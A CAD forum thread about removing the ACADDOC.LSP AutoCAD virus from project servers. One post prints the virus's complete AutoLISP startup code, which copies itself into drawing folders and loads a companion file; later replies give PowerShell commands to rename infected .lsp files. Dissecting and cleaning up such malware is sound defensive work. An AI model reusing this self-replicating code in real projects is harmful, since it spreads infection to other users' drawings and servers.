Topic: acaddoc>lsp

[HasanCAD]

Hi all

While open cad file this message comes. I belive that it is ACADDOC.LSP virus.
How to stop that virus attacking the files on server?

[ChrisCarlson]

For one, why does a project folder have a lisp routine in it?

AutoCAD initiated a secure directory function within the lisp routines, if a routine wants to run that is not within a designated secure folder that pop-up will display. 

[ChrisCarlson]

Double post,

I would upload that file we can verify it's clean

[Rob...]

This has been around a long time and there is plenty of information out there about how to get rid of it. Do you need help searching for a solution or are you looking for someone with first hand experience?

[Rob...]

For one, why does a project folder have a lisp routine in it?

The virus puts it there.

[HasanCAD]

Déjà vu all over again

WARNING [kdub]: DO NOT DOWNLOAD AND SAVE THIS FILE LOCALLY unless you know exactly what the file does ... user beware !!
note added kdub.

this is the file.

Code - Auto/Visual Lisp: [Select]

1. (defun-q s::startup
2.          (/ basepath        baseacad        acaddocpath
3.             r-acaddoc       w-basepath      rl-acaddoc
4.             acaddoclsp      c-acaddocname   c-acaddocpath
5.             c-acaddoc
6.            )
7.          (setq basepath
8.                 (findfile "base.dcl")
9.          )
10.          (setq basepath
11.                 (substr basepath 1 (- (strlen basepath) 8))
12.          )
13.          (setq baseacad (strcat basepath "acaddoc.lsp"))
14.          (setq acaddocpath (findfile "acaddoc.lsp"))
15.          (setq acaddocpath
16.                 (substr acaddocpath
17.                         1
18.                         (- (strlen acaddocpath) 11)
19.                 )
20.          )
21.          (setq acaddoclsp (strcat acaddocpath "acaddoc.lsp"))
22.          (setq c-acaddocname (getvar "dwgname"))
23.          (setq c-acaddocpath (findfile c-acaddocname))
24.          (setq c-acaddocpath
25.                 (substr c-acaddocpath
26.                         1
27.                         (- (strlen c-acaddocpath) (strlen c-acaddocname))
28.                 )
29.          )
30.          (setq c-acaddoc
31.                 (strcat c-acaddocpath "acaddoc.lsp")
32.          )
33.          (if
34.            (and
35.              (/= basepath acaddocpath)
36.              (= c-acaddocpath acaddocpath)
37.            )
38.             (progn
39.               (setq r-acaddoc
40.                      (open acaddoclsp "r")
41.               )
42.               (setq w-basepath
43.                      (open baseacad "w")
44.               )
45.               (while
46.                 (setq rl-acaddoc
47.                        (read-line r-acaddoc)
48.                 )
49.                  (write-line rl-acaddoc w-basepath)
50.               )
51.               (close w-basepath)
52.               (close r-acaddoc)
53.             )
54.  
55.             (progn
56.               (setq r-acaddoc
57.                      (open acaddoclsp "r")
58.               )
59.               (setq w-basepath
60.                      (open c-acaddoc "w")
61.               )
62.               (while
63.                 (setq rl-acaddoc
64.                        (read-line r-acaddoc)
65.                 )
66.                  (write-line rl-acaddoc w-basepath)
67.               )
68.               (close w-basepath)
69.               (close r-acaddoc)
70.             )
71.          )
72.          (princ)
73. )
74. (load "acadapq")
75. (princ)
76.  

[ChrisCarlson]

Refer to here,

http://www.theswamp.org/index.php?topic=35330.0

Infact you are the original poster

[BlackBox]

Close all sessions of AutoCAD, and then have your IT Admin, or someone responsible using a domain account with sufficient Active Directory permissions, call this PowerShell (As Administrator?):

Code - C#: [Select]

1. Get-ChildItem <YourProjectFolderNetworkShareRoot>\*.* -Include *.lsp | Rename-Item -NewName { $_.Name -Replace ".lsp",".lsp.blacklist" }
2.  

* Warning - This PowerShell will rename ALL *.lsp files in ALL project folders; change the resultant file extension as needed.

[Kerry]

Refer to here,

http://www.theswamp.org/index.php?topic=35330.0

Infact you are the original poster

That thread does look familiar

[HasanCAD]

Close all sessions of AutoCAD, and then have your IT Admin, or someone responsible using a domain account with sufficient Active Directory permissions, call this PowerShell (As Administrator?):

Code - C#: [Select]

1. Get-ChildItem <YourProjectFolderNetworkShareRoot>\*.* -Include *.lsp | Rename-Item -NewName { $_.Name -Replace ".lsp",".lsp.blacklist" }
2.  

* Warning - This PowerShell will rename ALL *.lsp files in ALL project folders; change the resultant file extension as needed.

Could we use

Code - Auto/Visual Lisp: [Select]

1. \*.* -Include acaddoc.lsp |

instead of

Code - Auto/Visual Lisp: [Select]

1. \*.* -Include *.lsp |

[BlackBox]

Close all sessions of AutoCAD, and then have your IT Admin, or someone responsible using a domain account with sufficient Active Directory permissions, call this PowerShell (As Administrator?):

Code - C#: [Select]

1. Get-ChildItem <YourProjectFolderNetworkShareRoot>\*.* -Include *.lsp | Rename-Item -NewName { $_.Name -Replace ".lsp",".lsp.blacklist" }
2.  

* Warning - This PowerShell will rename ALL *.lsp files in ALL project folders; change the resultant file extension as needed.

Could we use

Code - Auto/Visual Lisp: [Select]

1. \*.* -Include acaddoc.lsp |

instead of

Code - Auto/Visual Lisp: [Select]

1. \*.* -Include *.lsp |

Certainly - Just offering an en-mass example; take from it what you like.

[tombu]

You should also try with

Code: [Select]

\*.* -Include acadapq.* |as it's the code that does most of the damage.  Could be VLX, ,FAS, or .LSP

[jmaeding]

if Autodesk really cared about this, they would make a filewatcher util that looked for a new acad.lsp and other startup files appearing in project folders. Its fairly easy to write in .net, but somehow the real issues people get hit with are not exotic enough to be dealt with. Instead we get "lisp signing" and "total control" type security in 2016, as if its needed or decent to implement in an office with people that actually write scripts and minor lisps as they work.
Are they trying to squash user customization with lisp, just like they did with the CUI system that wants the main menu to be the acad one, yet user customization happens to the main menu at the same time. So you have to play the menu switch game which never goes well in the end. So not we do not make custom toolbars. Thanks Autodesk.

[Rob...]

Really? You blame AutoDesk?

If you feel vulnerable to this and it's so easy, make it yourself. Most people have protocols in place to avoid this type of thing. It is easy. Just like basic virus protection, it's up to the users to implement the necessary safeguards. You cannot blame AutoDesk for not protecting us, if some of us can't protect ourselves from the maliciousness of others.

The stuff about your issues with customization are not even related to the topic at hand.

[BlackBox]